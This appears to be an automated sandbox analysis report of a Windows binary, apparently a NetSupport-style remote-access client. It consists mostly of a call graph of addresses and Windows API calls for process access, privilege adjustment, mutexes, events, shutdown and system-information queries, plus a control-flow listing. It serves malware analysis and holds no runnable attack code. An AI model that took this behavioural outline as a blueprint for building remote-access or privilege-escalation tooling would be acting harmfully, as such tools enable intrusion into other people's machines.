11060970 264 API calls 97289 1102e545 97287->97289 97290 11142a60 std::locale::_Init 21 API calls 97288->97290 97291 11060970 264 API calls 97289->97291 97292 1102e449 OpenProcess 97290->97292 97293 1102e551 97291->97293 97292->97283 97294 1102e469 97292->97294 97295 1102e568 97293->97295 97296 1102e55f 97293->97296 97298 11142a60 std::locale::_Init 21 API calls 97294->97298 97621 11141f80 97295->97621 98163 110279d0 115 API calls 2 library calls 97296->98163 97301 1102e49c 97298->97301 97299 1102e564 97299->97295 97303 1102e4db CloseHandle FindWindowA 97301->97303 97304 11142a60 std::locale::_Init 21 API calls 97301->97304 97302 1102e577 97307 11141430 263 API calls 97302->97307 97305 1102e503 GetWindowThreadProcessId 97303->97305 97306 1102e517 97303->97306 97308 1102e4ae SendMessageA WaitForSingleObject 97304->97308 97305->97306 97309 11142a60 std::locale::_Init 21 API calls 97306->97309 97308->97303 97312 1102e4ce 97308->97312 97313 1102e524 97309->97313 97314 11142a60 std::locale::_Init 21 API calls 97312->97314 97313->97283 97315 1102e4d8 97314->97315 97315->97303 97615 110609e6 97614->97615 97616 11060997 97614->97616 97617 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 97615->97617 97616->97615 97618 11080c50 82 API calls 97616->97618 98185 11060890 264 API calls 4 library calls 97616->98185 97620 1102e539 97617->97620 97618->97616 97620->97287 97622 11141240 std::locale::_Init 261 API calls 97621->97622 97623 11141f9b wsprintfA 97622->97623 97624 11141240 std::locale::_Init 261 API calls 97623->97624 97625 11141fb7 wsprintfA 97624->97625 97626 1113f8a0 std::locale::_Init 8 API calls 97625->97626 97628 11141fd4 97626->97628 97627 11142000 97630 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 97627->97630 97628->97627 97629 1113f8a0 std::locale::_Init 8 API calls 97628->97629 97632 11141fe9 97629->97632 97631 1114200c 97630->97631 97631->97302 97632->97627 97633 11141ff0 97632->97633 97634 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 97633->97634 97635 11141ffc 97634->97635 97635->97302 98163->97299 98185->97616 99739 110400d8 99749 110f8740 GetTokenInformation 99739->99749 99741 110400ea CloseHandle 99742 11040101 99741->99742 99743 110f8740 15 API calls 99742->99743 99744 1104019a 99743->99744 99745 110401a2 CloseHandle 99744->99745 99746 110401a9 99744->99746 99745->99746 99747 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 99746->99747 99748 110401e7 99747->99748 99750 110f8788 99749->99750 99751 110f8777 99749->99751 99759 110efc70 9 API calls 99750->99759 99752 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 99751->99752 99755 110f8784 99752->99755 99754 110f87ac 99754->99751 99756 110f87b4 99754->99756 99755->99741 99757 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 99756->99757 99758 110f87da 99757->99758 99758->99741 99759->99754 99760 11170208 99761 11167f85 __getptd 62 API calls 99760->99761 99762 11170225 _LcidFromHexString 99761->99762 99763 11170232 GetLocaleInfoA 99762->99763 99764 11170265 99763->99764 99782 11170259 99763->99782 99783 11160e4e 81 API calls 3 library calls 99764->99783 99766 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 99768 111703d5 99766->99768 99767 11170271 99769 1117027b GetLocaleInfoA 99767->99769 99779 111702ab _CountryEnumProc@4 _strlen 99767->99779 99771 1117029a 99769->99771 99769->99782 99770 1117031e GetLocaleInfoA 99772 11170341 99770->99772 99770->99782 99784 11160e4e 81 API calls 3 library calls 99771->99784 99786 11160e4e 81 API calls 3 library calls 99772->99786 99775 111702a5 99775->99779 99785 1115ff54 81 API calls 3 library calls 99775->99785 99777 1117034c 99780 11170354 _strlen 99777->99780 99777->99782 99787 11160e4e 81 API calls 3 library calls 99777->99787 99779->99770 99779->99782 99780->99782 99788 111701ad GetLocaleInfoW _GetPrimaryLen _strlen 99780->99788 99782->99766 99783->99767 99784->99775 99785->99779 99786->99777 99787->99780 99788->99782 99789 401020 GetCommandLineA 99790 401032 99789->99790 99790->99790 99791 40106c GetStartupInfoA 99790->99791 99792 401086 GetModuleHandleA 99791->99792 99796 401000 _NSMClient32 99792->99796 99795 4010a8 ExitProcess 99796->99795 99797 110259a0 LoadLibraryA 99798 110259e0 99799 110259ee GetProcAddress 99798->99799 99800 110259ff 99798->99800 99799->99800 99801 11025a18 99800->99801 99802 11025a0c K32GetProcessImageFileNameA 99800->99802 99804 11025a1e GetProcAddress 99801->99804 99805 11025a2f 99801->99805 99802->99801 99803 11025a51 99802->99803 99804->99805 99806 11025a36 99805->99806 99807 11025a47 SetLastError 99805->99807 99807->99803 99808 11140870 99809 11140881 99808->99809 99822 11140290 99809->99822 99813 11140905 99816 11140922 99813->99816 99818 11140904 99813->99818 99814 111408cb 99815 111408d2 ResetEvent 99814->99815 99830 11140450 261 API calls 2 library calls 99815->99830 99818->99813 99831 11140450 261 API calls 2 library calls 99818->99831 99819 111408e6 SetEvent WaitForMultipleObjects 99819->99815 99819->99818 99821 1114091f 99821->99816 99823 1114029c GetCurrentProcess 99822->99823 99825 111402bf 99822->99825 99824 111402ad GetModuleFileNameA 99823->99824 99823->99825 99824->99825 99826 1110c420 std::locale::_Init 259 API calls 99825->99826 99828 111402e9 WaitForMultipleObjects 99825->99828 99827 111402db 99826->99827 99827->99828 99832 1113fbe0 GetModuleFileNameA 99827->99832 99828->99813 99828->99814 99830->99819 99831->99821 99833 1113fc63 99832->99833 99834 1113fc23 99832->99834 99837 1113fc89 GetModuleHandleA GetProcAddress 99833->99837 99838 1113fc6f LoadLibraryA 99833->99838 99835 11080be0 std::locale::_Init IsDBCSLeadByte 99834->99835 99836 1113fc31 99835->99836 99836->99833 99839 1113fc38 LoadLibraryA 99836->99839 99841 1113fcb7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 99837->99841 99842 1113fca9 99837->99842 99838->99837 99840 1113fc7e LoadLibraryA 99838->99840 99839->99833 99840->99837 99843 1113fce3 10 API calls 99841->99843 99842->99843 99844 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 99843->99844 99845 1113fd60 99844->99845 99845->99828 99846 1104cea0 99852 1104cede _strncpy 99846->99852 99863 1104cf7e 99846->99863 99848 1104cf9f 99849 1104d018 99848->99849 99854 1104cfa6 99848->99854 99850 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 99849->99850 99851 1104d02a 99850->99851 99852->99849 99859 11080c50 82 API calls 99852->99859 99853 1104cffc 99856 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 99853->99856 99854->99853 99864 11086e70 99854->99864 99858 1104d014 99856->99858 99861 1104cf3c _strncpy 99859->99861 99860 1113e8f0 std::locale::_Init 261 API calls 99860->99853 99861->99849 99862 1102a620 276 API calls 99861->99862 99862->99863 99889 11049da0 312 API calls 7 library calls 99863->99889 99890 11087510 99864->99890 99866 11086ebb 99895 11087640 265 API calls _sprintf 99866->99895 99868 11086eea 99869 11086ef0 99868->99869 99870 11086f04 _memset 99868->99870 99896 110290f0 261 API calls 2 library calls 99869->99896 99897 1113ee60 8 API calls 3 library calls 99870->99897 99874 11086f2b 99898 11143f40 261 API calls std::locale::_Init 99874->99898 99876 11086f84 99877 11086fa1 99876->99877 99878 11086fb5 99876->99878 99899 110290f0 261 API calls 2 library calls 99877->99899 99880 111415b0 8 API calls 99878->99880 99882 11086fc5 99880->99882 99883 1115f3b5 _free 23 API calls 99882->99883 99884 11086fcb std::ios_base::_Tidy 99883->99884 99900 110875d0 FreeLibrary std::ios_base::_Tidy 99884->99900 99886 11086ff6 99887 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 99886->99887 99888 1104cfee 99887->99888 99888->99860 99889->99848 99901 1115e4f0 99890->99901 99895->99868 99897->99874 99898->99876 99900->99886 99902 11087534 InitializeCriticalSection 99901->99902 99903 11087380 99902->99903 99904 11142150 267 API calls 99903->99904 99906 110873b3 99904->99906 99905 110874b8 99905->99866 99906->99905 99906->99906 99907 1110c420 std::locale::_Init 261 API calls 99906->99907 99908 11087409 99907->99908 99909 1108744d 99908->99909 99910 11087436 99908->99910 99916 11085840 99909->99916 99945 110290f0 261 API calls 2 library calls 99910->99945 99914 11142150 267 API calls 99915 11087458 99914->99915 99915->99905 99915->99914 99915->99915 99917 1108585b 99916->99917 99918 1108585f 99917->99918 99919 11085870 99917->99919 99920 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 99918->99920 99921 11141240 std::locale::_Init 261 API calls 99919->99921 99922 1108586c 99920->99922 99923 11085877 99921->99923 99922->99915 99923->99923 99924 1108589b LoadLibraryA 99923->99924 99925 11085939 GetProcAddress 99924->99925 99926 110858d4 99924->99926 99927 110859dc 99925->99927 99928 11085954 GetProcAddress 99925->99928 99929 110858dd GetModuleFileNameA 99926->99929 99930 11085930 99926->99930 99932 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 99927->99932 99928->99927 99931 11085965 GetProcAddress 99928->99931 99933 11080be0 std::locale::_Init IsDBCSLeadByte 99929->99933 99930->99925 99930->99927 99931->99927 99935 11085976 GetProcAddress 99931->99935 99936 110859ea 99932->99936 99934 110858fe LoadLibraryA 99933->99934 99934->99930 99935->99927 99937 11085987 GetProcAddress 99935->99937 99936->99915 99937->99927 99938 11085998 GetProcAddress 99937->99938 99938->99927 99939 110859a9 GetProcAddress 99938->99939 99939->99927 99940 110859ba GetProcAddress 99939->99940 99940->99927 99941 110859cb GetProcAddress 99940->99941 99941->99927 99942 110859ee 99941->99942 99943 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 99942->99943 99944 11085a00 99943->99944 99944->99915 99946 110302a9 99947 1113f670 std::locale::_Init RegQueryValueExA 99946->99947 99948 110302d1 99947->99948 99949 110303bc RegCloseKey 99948->99949 99951 1115f5b7 std::locale::_Init 75 API calls 99948->99951 99950 110303e6 99949->99950 99952 110303ed 99950->99952 99954 110304d1 99950->99954 99953 110302e5 99951->99953 99957 1110c420 std::locale::_Init 261 API calls 99952->99957 99955 111601fd std::locale::_Init 75 API calls 99953->99955 99958 1110c420 std::locale::_Init 261 API calls 99954->99958 99956 110302f4 99955->99956 99959 11030312 99956->99959 99963 111601fd std::locale::_Init 75 API calls 99956->99963 99961 11030414 99957->99961 99960 110304d8 99958->99960 99964 1115f5b7 std::locale::_Init 75 API calls 99959->99964 100028 110f8130 268 API calls std::locale::_Init 99960->100028 99965 11105d40 445 API calls 99961->99965 99963->99956 99969 1103031e 99964->99969 99966 11030430 GetStockObject GetObjectA 99965->99966 99968 11030696 SetErrorMode SetErrorMode 99966->99968 99971 1110c420 std::locale::_Init 261 API calls 99968->99971 99969->99949 99972 1113f670 std::locale::_Init RegQueryValueExA 99969->99972 99973 110306d2 99971->99973 99974 11030374 99972->99974 99977 11027fe0 264 API calls 99973->99977 99975 1113f670 std::locale::_Init RegQueryValueExA 99974->99975 99976 1103039d 99975->99976 99976->99949 99978 110306ec 99977->99978 99979 1110c420 std::locale::_Init 261 API calls 99978->99979 99980 11030712 99979->99980 99981 11027fe0 264 API calls 99980->99981 99982 1103072b InterlockedExchange 99981->99982 99984 1110c420 std::locale::_Init 261 API calls 99982->99984 99985 11030753 99984->99985 99986 11089840 263 API calls 99985->99986 99987 1103076b GetACP 99986->99987 99989 1115f8a3 _sprintf 93 API calls 99987->99989 99990 11030792 99989->99990 99991 11161c63 _setlocale 97 API calls 99990->99991 99992 1103079c 99991->99992 99993 1113f220 82 API calls 99992->99993 99994 110307c8 99993->99994 99995 1110c420 std::locale::_Init 261 API calls 99994->99995 99996 110307e8 99995->99996 99997 11060520 261 API calls 99996->99997 99998 11030813 99997->99998 99999 1103083a 99998->99999 100000 1110c420 std::locale::_Init 261 API calls 99998->100000 100001 110cb920 4 API calls 99999->100001 100000->99999 100002 11030886 100001->100002 100003 1110c420 std::locale::_Init 261 API calls 100002->100003 100004 1103088d 100003->100004 100005 110308e0 100004->100005 100006 11030967 100004->100006 100007 1110c420 std::locale::_Init 261 API calls 100005->100007 100011 11030965 std::ios_base::_Tidy 100006->100011 100031 11121fc0 430 API calls 100006->100031 100009 110308e7 100007->100009 100008 1100d500 FreeLibrary 100012 11030980 100008->100012 100013 110308ff 100009->100013 100014 110879a0 264 API calls 100009->100014 100011->100008 100016 1100d220 wsprintfA 100012->100016 100020 11030999 100012->100020 100015 1110c420 std::locale::_Init 261 API calls 100013->100015 100014->100013 100017 11030916 100015->100017 100018 1103098e 100016->100018 100024 1103093a 100017->100024 100029 1105b8c0 294 API calls 100017->100029 100019 11142a60 std::locale::_Init 21 API calls 100018->100019 100019->100020 100022 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 100020->100022 100023 11030aff 100022->100023 100030 1105bcb0 424 API calls 100024->100030 100026 11030960 100028->99966 100029->100024 100030->100026 100031->100011 100032 1102ce2d InterlockedIncrement 100033 1102ce59 GetCurrentProcess SetPriorityClass 100032->100033 100034 1102ce3c 100032->100034 100036 1102ce8d 100033->100036 100035 11142a60 std::locale::_Init 21 API calls 100034->100035 100037 1102ce46 100035->100037 100038 1102ce96 SetEvent 100036->100038 100041 1102ce9d 100036->100041 100039 1102ce50 Sleep 100037->100039 100038->100041 100039->100039 100040 1102ced4 100042 1102cf02 100040->100042 100129 1109e4e0 271 API calls std::locale::_Init 100040->100129 100041->100040 100127 11029010 275 API calls 2 library calls 100041->100127 100130 11028b10 498 API calls std::locale::_Init 100042->100130 100046 1102cebd 100128 110fd040 274 API calls 2 library calls 100046->100128 100047 1102cf13 100110 11027d00 SetEvent 100047->100110 100050 1102cf18 100051 1102cf22 100050->100051 100052 1102cf4f 100050->100052 100051->100050 100131 11058ac0 SetEvent 100051->100131 100053 1102cf57 100052->100053 100054 1102cf8e 100052->100054 100053->100054 100061 1102cf83 Sleep 100053->100061 100056 11142a60 std::locale::_Init 21 API calls 100054->100056 100057 1102cf98 100056->100057 100058 1102cfa5 100057->100058 100059 1102cfd6 100057->100059 100058->100057 100062 1105d340 75 API calls 100058->100062 100060 1102cfd3 100059->100060 100111 110af250 100059->100111 100060->100059 100061->100054 100063 1102cfc8 100062->100063 100063->100059 100132 1102cc30 290 API calls std::locale::_Init 100063->100132 100070 1102d01a 100071 1102d02d 100070->100071 100134 11132620 295 API calls 5 library calls 100070->100134 100072 1100d500 FreeLibrary 100071->100072 100074 1102d339 100072->100074 100075 1102d350 100074->100075 100076 1100d220 wsprintfA 100074->100076 100079 1102d377 GetModuleFileNameA GetFileAttributesA 100075->100079 100087 1102d493 100075->100087 100077 1102d345 100076->100077 100078 11142a60 std::locale::_Init 21 API calls 100077->100078 100078->100075 100080 1102d39f 100079->100080 100079->100087 100082 1110c420 std::locale::_Init 261 API calls 100080->100082 100081 11142a60 std::locale::_Init 21 API calls 100083 1102d542 100081->100083 100085 1102d3a6 100082->100085 100137 11142a20 FreeLibrary 100083->100137 100089 1113f0c0 263 API calls 100085->100089 100086 1102d54a 100088 1102d586 100086->100088 100090 1102d574 ExitWindowsEx 100086->100090 100091 1102d564 ExitWindowsEx Sleep 100086->100091 100087->100081 100097 1102d3c8 100089->100097 100090->100088 100091->100090 100110->100050 100138 1107f690 100111->100138 100116 1102cffa 100120 110e8da0 100116->100120 100117 110af297 100150 110290f0 261 API calls 2 library calls 100117->100150 100121 110af250 263 API calls 100120->100121 100122 110e8dcd 100121->100122 100166 110e8170 100122->100166 100126 1102d005 100133 110af440 263 API calls std::locale::_Init 100126->100133 100127->100046 100128->100040 100129->100042 100130->100047 100131->100052 100132->100060 100133->100070 100134->100071 100137->100086 100139 1107f6b4 100138->100139 100140 1107f6cf 100139->100140 100141 1107f6b8 100139->100141 100143 1107f6cc 100140->100143 100144 1107f6e8 100140->100144 100151 110290f0 261 API calls 2 library calls 100141->100151 100143->100140 100152 110290f0 261 API calls 2 library calls 100143->100152 100147 110af240 100144->100147 100153 11080370 100147->100153 100154 110803bd 100153->100154 100155 11080391 100153->100155 100157 1108040a wsprintfA 100154->100157 100158 110803e5 wsprintfA 100154->100158 100155->100154 100156 110803ab 100155->100156 100159 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 100156->100159 100165 110290f0 261 API calls 2 library calls 100157->100165 100158->100154 100161 110803b9 100159->100161 100161->100116 100161->100117 100168 110e817b 100166->100168 100167 110e8215 100176 110af440 263 API calls std::locale::_Init 100167->100176 100168->100167 100169 110e819e 100168->100169 100170 110e81b5 100168->100170 100177 110290f0 261 API calls 2 library calls 100169->100177 100172 110e81b2 100170->100172 100173 110e81e2 SendMessageTimeoutA 100170->100173 100172->100170 100178 110290f0 261 API calls 2 library calls 100172->100178 100173->100167 100176->100126 100179 1110e460 100191 1110e3c0 GetSystemDirectoryA 100179->100191 100183 1110e525 100184 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 100183->100184 100185 1110e532 100184->100185 100186 1110e4bb 100186->100183 100187 1110e4f9 GetComputerNameA 100186->100187 100187->100183 100188 1110e512 100187->100188 100197 110cf020 265 API calls 2 library calls 100188->100197 100190 1110e522 100190->100183 100192 1110e40a __wsplitpath 100191->100192 100192->100192 100193 1110e419 GetVolumeInformationA 100192->100193 100194 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 100193->100194 100195 1110e450 100194->100195 100196 110cf020 265 API calls 2 library calls 100195->100196 100196->100186 100197->100190 100198 1106fd70 100204 1106fda0 std::ios_base::_Tidy 100198->100204 100199 1106ff03 100200 1106fdc2 Sleep EnterCriticalSection 100200->100204 100201 1106fe7e LeaveCriticalSection 100201->100204 100204->100199 100204->100200 100204->100201 100205 1106fedd 100204->100205 100208 1106ae60 294 API calls 100204->100208 100209 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 100204->100209 100205->100204 100210 1106e810 332 API calls 3 library calls 100205->100210 100211 1110cba0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection std::ios_base::_Tidy 100205->100211 100208->100204 100209->100204 100210->100205 100211->100205 100212 1102ff34 100213 1113f0c0 263 API calls 100212->100213 100214 1102ff42 100213->100214 100215 1113f220 82 API calls 100214->100215 100216 1102ff85 100215->100216 100217 1102ff9a 100216->100217 100218 11080c50 82 API calls 100216->100218 100219 110eaed0 8 API calls 100217->100219 100218->100217 100220 1102ffc5 100219->100220 100221 1103000c 100220->100221 100263 110eaf80 77 API calls 2 library calls 100220->100263 100225 1113f220 82 API calls 100221->100225 100223 1102ffda 100264 110eaf80 77 API calls 2 library calls 100223->100264 100227 11030021 100225->100227 100226 1102fff0 100226->100221 100229 111429e0 19 API calls 100226->100229 100228 1110c420 std::locale::_Init 261 API calls 100227->100228 100230 11030030 100228->100230 100229->100221 100231 11030051 100230->100231 100232 110879a0 264 API calls 100230->100232 100233 11089840 263 API calls 100231->100233 100232->100231 100234 11030064 OpenMutexA 100233->100234 100235 11030083 CreateMutexA 100234->100235 100236 1103016c CloseHandle 100234->100236 100238 110300a5 100235->100238 100256 11089940 100236->100256 100239 1110c420 std::locale::_Init 261 API calls 100238->100239 100242 110300ba 100239->100242 100240 11030182 100241 1115e4d1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 100240->100241 100244 11030aff 100241->100244 100265 11015e10 LoadLibraryA 100242->100265 100245 110300ef 100246 11030103 GetProcAddress 100245->100246 100247 11030119 100245->100247 100246->100247 100248 1103011d SetLastError 100246->100248 100249 11027e10 47 API calls 100247->100249 100248->100247 100250 1103012a 100249->100250 100266 11009320 425 API calls std::locale::_Init 100250->100266 100252 11030139 100253 11030142 WaitForSingleObject 100252->100253 100253->100253 100254 11030154 CloseHandle 100253->100254 100254->100236 100255 11030165 FreeLibrary 100254->100255 100255->100236 100257 110899e7 100256->100257 100260 1108997a std::ios_base::_Tidy 100256->100260 100258 110899ee DeleteCriticalSection 100257->100258 100267 11139f90 100258->100267 100259 1108998e CloseHandle 100259->100260 100260->100257 100260->100259 100262 11089a14 std::ios_base::_Tidy 100262->100240 100263->100223 100264->100226 100265->100245 100266->100252 100268 11139fa4 100267->100268 100269 11139fa8 100268->100269 100271 11139bb0 35 API calls 2 library calls 100268->100271 100269->100262 100271->100268 100272 685963a0 100277 68596350 100272->100277 100275 685963a9 WSACancelBlockingCall 100276 685963b1 Sleep 100278 6859638d 100277->100278 100279 685b28e1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 100278->100279 100280 68596397 100279->100280 100280->100275 100280->100276 100281 685b5ae6 100282 685b5af1 100281->100282 100283 685b5af6 100281->100283 100295 685bf28f GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 100282->100295 100287 685b59f0 100283->100287 100286 685b5b04 100288 685b59fc _fseek 100287->100288 100292 685b5a49 ___DllMainCRTStartup 100288->100292 100293 685b5a99 _fseek 100288->100293 100296 685b588c 100288->100296 100290 685b5a79 100291 685b588c __CRT_INIT@12 149 API calls 100290->100291 100290->100293 100291->100293 100292->100290 100292->100293 100294 685b588c __CRT_INIT@12 149 API calls 100292->100294 100293->100286 100294->100290 100295->100283 100297 685b5898 _fseek 100296->100297 100298 685b591a 100297->100298 100299 685b58a0 100297->100299 100301 685b597b 100298->100301 100302 685b5920 100298->100302 100348 685b607f HeapCreate 100299->100348 100303 685b59d9 100301->100303 100304 685b5980 100301->100304 100308 685b593e 100302->100308 100315 685b58a9 _fseek 100302->100315 100358 685b5e35 66 API calls _doexit 100302->100358 100303->100315 100366 685b70ad 79 API calls __freefls@4 100303->100366 100363 685b6da9 TlsGetValue DecodePointer TlsSetValue 100304->100363 100305 685b58a5 100307 685b58b0 100305->100307 100305->100315 100349 685b7127 86 API calls 5 library calls 100307->100349 100311 685b5952 100308->100311 100359 685b9b09 67 API calls _free 100308->100359 100362 685b5965 70 API calls __mtterm 100311->100362 100313 685b5985 100364 685bd3f5 66 API calls __calloc_crt 100313->100364 100314 685b58b5 __RTC_Initialize 100326 685b58c5 GetCommandLineA 100314->100326 100342 685b58b9 100314->100342 100315->100292 100319 685b5991 100319->100315 100321 685b599d DecodePointer 100319->100321 100320 685b5948 100360 685b6dfa 70 API calls _free 100320->100360 100327 685b59b2 100321->100327 100324 685b58be 100324->100315 100325 685b594d 100361 685b609d HeapDestroy 100325->100361 100351 685bf016 71 API calls 2 library calls 100326->100351 100330 685b59cd 100327->100330 100331 685b59b6 100327->100331 100334 685b1bfd _free 66 API calls 100330->100334 100365 685b6e37 66 API calls 4 library calls 100331->100365 100332 685b58d5 100352 685b98c4 73 API calls __calloc_crt 100332->100352 100334->100324 100336 685b59bd GetCurrentThreadId 100336->100315 100337 685b58df 100338 685b58e3 100337->100338 100354 685bef5b 95 API calls 3 library calls 100337->100354 100353 685b6dfa 70 API calls _free 100338->100353 100341 685b58ef 100343 685b5903 100341->100343 100355 685becd4 94 API calls 6 library calls 100341->100355 100350 685b609d HeapDestroy 100342->100350 100343->100324 100357 685b9b09 67 API calls _free 100343->100357 100346 685b58f8 100346->100343 100356 685b5c32 77 API calls 4 library calls 100346->100356 100348->100305 100349->100314 100350->100324 100351->100332 100352->100337 100353->100342 100354->100341 100355->100346 100356->100343 100357->100338 100358->100308 100359->100320 100360->100325 100361->100311 100362->100315 100363->100313 100364->100319 100365->100336 100366->100315

                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                    Function 1109D4A0 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 614 1109d4a0-1109d502 call 1109cc90 617 1109d508-1109d52b call 1109c750 614->617 618 1109db20 614->618 624 1109d531-1109d545 LocalAlloc 617->624 625 1109d694-1109d696 617->625 620 1109db22-1109db3d call 1115e4d1 618->620 626 1109d54b-1109d57d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 624->626 627 1109db15-1109db1b call 1109c7e0 624->627 628 1109d626-1109d64b CreateFileMappingA 625->628 631 1109d60a-1109d620 626->631 632 1109d583-1109d5ae call 1109c6c0 call 1109c700 626->632 627->618 629 1109d698-1109d6ab GetLastError 628->629 630 1109d64d-1109d66d GetLastError call 110ee9e0 628->630 636 1109d6ad 629->636 637 1109d6b2-1109d6c9 MapViewOfFile 629->637 645 1109d678-1109d680 630->645 646 1109d66f-1109d676 LocalFree 630->646 631->628 663 1109d5f9-1109d601 632->663 664 1109d5b0-1109d5e6 GetSecurityDescriptorSacl 632->664 636->637 638 1109d6cb-1109d6e6 call 110ee9e0 637->638 639 1109d707-1109d70f 637->639 657 1109d6e8-1109d6e9 LocalFree 638->657 658 1109d6eb-1109d6f3 638->658 643 1109d7b1-1109d7c3 639->643 644 1109d715-1109d72e GetModuleFileNameA 639->644 649 1109d809-1109d822 call 1115e4f0 GetTickCount 643->649 650 1109d7c5-1109d7c8 643->650 651 1109d7cd-1109d7e8 call 110ee9e0 644->651 652 1109d734-1109d73d 644->652 653 1109d682-1109d683 LocalFree 645->653 654 1109d685-1109d68f 645->654 646->645 675 1109d824-1109d829 649->675 659 1109d8af-1109d913 GetCurrentProcessId GetModuleFileNameA call 1109cb20 650->659 679 1109d7ea-1109d7eb LocalFree 651->679 680 1109d7ed-1109d7f5 651->680 652->651 660 1109d743-1109d746 652->660 653->654 662 1109db0e-1109db10 call 1109cbd0 654->662 657->658 668 1109d6f8-1109d702 658->668 669 1109d6f5-1109d6f6 LocalFree 658->669 684 1109d91b-1109d932 CreateEventA 659->684 685 1109d915 659->685 671 1109d789-1109d7ac call 110ee9e0 call 1109cbd0 660->671 672 1109d748-1109d74c 660->672 662->627 663->631 666 1109d603-1109d604 FreeLibrary 663->666 664->663 665 1109d5e8-1109d5f3 SetSecurityDescriptorSacl 664->665 665->663 666->631 668->662 669->668 671->643 672->671 678 1109d74e-1109d759 672->678 681 1109d82b-1109d83a 675->681 682 1109d83c 675->682 686 1109d760-1109d764 678->686 679->680 687 1109d7fa-1109d804 680->687 688 1109d7f7-1109d7f8 LocalFree 680->688 681->675 681->682 689 1109d83e-1109d844 682->689 693 1109d934-1109d953 GetLastError * 2 call 110ee9e0 684->693 694 1109d956-1109d95e 684->694 685->684 691 1109d780-1109d782 686->691 692 1109d766-1109d768 686->692 687->662 688->687 699 1109d855-1109d8ad 689->699 700 1109d846-1109d853 689->700 696 1109d785-1109d787 691->696 701 1109d76a-1109d770 692->701 702 1109d77c-1109d77e 692->702 693->694 697 1109d960 694->697 698 1109d966-1109d977 CreateEventA 694->698 696->651 696->671 697->698 705 1109d979-1109d998 GetLastError * 2 call 110ee9e0 698->705 706 1109d99b-1109d9a3 698->706 699->659 700->689 700->699 701->691 703 1109d772-1109d77a 701->703 702->696 703->686 703->702 705->706 708 1109d9ab-1109d9bd CreateEventA 706->708 709 1109d9a5 706->709 711 1109d9bf-1109d9de GetLastError * 2 call 110ee9e0 708->711 712 1109d9e1-1109d9e9 708->712 709->708 711->712 714 1109d9eb 712->714 715 1109d9f1-1109da02 CreateEventA 712->715 714->715 716 1109da24-1109da32 715->716 717 1109da04-1109da21 GetLastError * 2 call 110ee9e0 715->717 720 1109da34-1109da35 LocalFree 716->720 721 1109da37-1109da3f 716->721 717->716 720->721 723 1109da41-1109da42 LocalFree 721->723 724 1109da44-1109da4d 721->724 723->724 725 1109da53-1109da56 724->725 726 1109daf7-1109db09 call 110ee9e0 724->726 725->726 728 1109da5c-1109da5f 725->728 726->662 728->726 730 1109da65-1109da68 728->730 730->726 731 1109da6e-1109da71 730->731 732 1109da7c-1109da98 CreateThread 731->732 733 1109da73-1109da79 GetCurrentThreadId 731->733 734 1109da9a-1109daa4 732->734 735 1109daa6-1109dab0 732->735 733->732 734->662 736 1109daca-1109daf5 SetEvent call 110ee9e0 call 1109c7e0 735->736 737 1109dab2-1109dac8 ResetEvent * 3 735->737 736->620 737->736
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1109C750: GetCurrentProcess.KERNEL32(000F01FF,?,1102FAC3,00000000,00000000,00080000,24DE4E77,00080000,00000000,00000000), ref: 1109C77D
                                                                                                                                                                                                      • Part of subcall function 1109C750: OpenProcessToken.ADVAPI32(00000000), ref: 1109C784
                                                                                                                                                                                                      • Part of subcall function 1109C750: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C795
                                                                                                                                                                                                      • Part of subcall function 1109C750: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C7B9
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,24DE4E77,00080000,00000000,00000000), ref: 1109D535
                                                                                                                                                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109D54E
                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109D559
                                                                                                                                                                                                    • GetVersionExA.KERNEL32(?), ref: 1109D570
                                                                                                                                                                                                    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D5DE
